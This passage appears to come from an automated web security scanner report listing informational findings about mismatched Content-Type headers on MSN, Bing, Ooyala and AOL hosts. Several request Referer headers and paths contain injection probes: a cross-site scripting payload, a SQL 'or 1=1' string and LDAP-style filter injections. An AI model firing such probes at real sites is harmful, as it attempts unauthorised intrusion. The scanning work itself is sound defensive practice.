Host:   http://openchannel.msnbc.redacted
Path:   /_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=openchannel&path=/ HTTP/1.1
Host: openchannel.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://openchannel.msnbc.redacted/?52854%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae378974d45=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SSLB=0; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296392120662

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 12:54:52 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 460

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...

34.59. http://photoblog.msnbc.redacted/_vine/printer

Summary

Severity:   Information
Confidence:   Firm
Host:   http://photoblog.msnbc.redacted
Path:   /_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=photoblog&path=/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun HTTP/1.1
Host: photoblog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:19:40 GMT
Connection: close
Content-Length: 528

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...

34.60. http://player.ooyala.com/info/primary/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://player.ooyala.com
Path:   /info/primary/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /info/primary/ HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 413
Expires: Sun, 30 Jan 2011 12:49:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 12:49:00 GMT
Connection: close
Vary: Accept-Encoding

0rUzZg06AMIpM1+XiWY1NwIngAYgK7AH//ZAbmPZr9i1ivO3AZ99R9fLZRr/n8szkAfACfOLYP8G9I7CGFmFZCu7pBkNS/qR84JtlpczKdd/XBOmGV08ATKb8C2Rh416DfzgYfp5sbkbe0wf1Sg0zUTblr5d4eN7PfFYjtqzdLr88rPZng2NRdk5ksD3UHzdiR9ljpcy
...[SNIP]...

34.61. http://rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; Charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHQ2&AP=1402 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 961
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8009935-T22841720-C4000000000033190
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:26:32 GMT
Content-Length: 961


//<![CDATA[
function getRADIds() { return{"adid":"4000000000033190","pid":"8009935","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
tr
...[SNIP]...

34.62. http://sas.ooyala.com/authorized

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sas.ooyala.com
Path:   /authorized

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /authorized?embed%5Fcode%5Flist=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj%7CAxcnV3MTqRN%5FWSX8mNlR594n6311xhlc&parent%5Fauthorized=true&domain=technolog%2Emsnbc%2Emsn%2Ecom&signature=ZTCSAPMwQev6HB4Lp8uFEpo8cfcNcRTJRjvlxhICIGE&is%5Fjson=0&timestamp=1296391795389 HTTP/1.1
Host: sas.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 12:49:00 GMT
Status: 200 OK
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 436

wOl6RbSYry/+ZTKTqQemYLQMwnITDPaxZJbGIVUA5OmBLpO+qQkYVRFzwn35
tRdIQby+8GgI1s7e4oA5fM7ah/2+1Zq7tk6qAp6LFCDjASzcpRZv8fBZQs1m
nbmGGjWEib4TrcLUoL7rAe1ASycmWecK3N/pXlKZ+l6FR+P3Y344BEePXqDJ
bb1zmlzmVZmyEma1Q
...[SNIP]...

34.63. http://sas.ooyala.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sas.ooyala.com
Path:   /crossdomain.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /crossdomain.xml HTTP/1.1
Host: sas.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 12:49:00 GMT
Status: 200 OK
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 344
Expires: Sun, 30 Jan 2011 13:49:00 GMT
Cache-Control: public, must-revalidate, max-age=3600

<?xml version='1.0'?>
<!DOCTYPE cross-domain-policy SYSTEM 'http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd'>
<cross-domain-policy>
<site-control permitted-cross-domain-polic
...[SNIP]...

34.64. http://services.money.redacted/QuoteService/dynamic

Summary

Severity:   Information
Confidence:   Firm
Host:   http://services.money.msn.com
Path:   /QuoteService/dynamic

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /QuoteService/dynamic HTTP/1.1
Host: services.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:50:54 GMT
Connection: close
Content-Length: 27

Service manifest to come...

34.65. http://services.money.redacted/quoteservice/streaming

Summary

Severity:   Information
Confidence:   Firm
Host:   http://services.money.msn.com
Path:   /quoteservice/streaming

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /quoteservice/streaming HTTP/1.1
Host: services.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:50:54 GMT
Connection: close
Content-Length: 27

Service manifest to come...

34.66. http://static.pulse360.com/blob/3a/2bd5ab3_7821_mimg.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.pulse360.com
Path:   /blob/3a/2bd5ab3_7821_mimg.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /blob/3a/2bd5ab3_7821_mimg.jpg HTTP/1.1
Host: static.pulse360.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc_ms_1.3=EA

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:19:40 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:00:00 GMT
ETag: "1aeb0-100f-5f4d4000"
Accept-Ranges: bytes
Content-Length: 4111
Connection: close
Content-Type: image/jpeg

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

34.67. http://syndication.jobthread.com/jt/syndication/page.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://syndication.jobthread.com
Path:   /jt/syndication/page.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /jt/syndication/page.php?url_directory=&type=jobroll&s_domain_name=jobs.popsci.com&num_jobs=3&num_featured_jobs=0&display_method=default&template_name=popsci1&version=2.0 HTTP/1.1
Host: syndication.jobthread.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:16:05 GMT
Server: Apache/2
Vary: Host,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1723


   document.write('<div class="content"><div style="background:url(\'http://static.jobthread.com/files/site_images/727999/727999_popsci-jobs-widget.png\') no-repeat 0 0;height:24px;width:340px;"></div>
...[SNIP]...

34.68. http://technolog.msnbc.redacted/_vine/printer

Summary

Severity:   Information
Confidence:   Firm
Host:   http://technolog.msnbc.redacted
Path:   /_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=technolog&path=/_news/2011/01/28/*)(sn=*/ HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:19:41 GMT
Connection: close
Content-Length: 485

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...

34.69. http://thelastword.msnbc.redacted/_vine/printer

Summary

Severity:   Information
Confidence:   Firm
Host:   http://thelastword.msnbc.redacted
Path:   /_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=thelastword&path=/ HTTP/1.1
Host: thelastword.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; SSLB=0; jt_time=1296391736965

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=291
Date: Sun, 30 Jan 2011 12:48:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 461

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...

34.70. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Summary

Severity:   Information
Confidence:   Firm
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=43118469-708a-43ea-a596-af6467b86b10; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 30 Jan 2011 01:29:45 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 01:29:44 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:34:45 GMT;path=/

GIF89a.............!.......,...........D..;

34.71. http://vms.redacted/vms.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vms.redacted
Path:   /vms.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /vms.aspx HTTP/1.1
Host: vms.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Missing mediaid in the querystring
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:41 GMT
Content-Length: 11

Bad Request

34.72. http://webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Firm
Host:   http://webmail.aol.com
Path:   /$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: webmail.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:51:55 GMT
Content-Length: 11

Bad Request

34.73. http://wrapper.g.redacted/GRedirect.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wrapper.g.redacted
Path:   /GRedirect.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /GRedirect.aspx HTTP/1.1
Host: wrapper.g.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:52:07 GMT
Connection: close
Content-Length: 11

Bad Request

34.74. http://www.bing.com/events/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /events/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /events/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:30 GMT
Connection: close
Set-Cookie: _SS=SID=712D1F94FAED4E98B6E572C9C51BBEF4; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:30 GMT; domain=.bing.com; path=/

Ref A: B2575C613A604708B56E80B00C179519 Ref B: F3576EA2ACED896FAE6E8179524B8516 Ref C: Sat Jan 29 15:53:30 2011
PST

34.75. http://www.bing.com/maps/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bing.com
Path:   /maps/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /maps/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
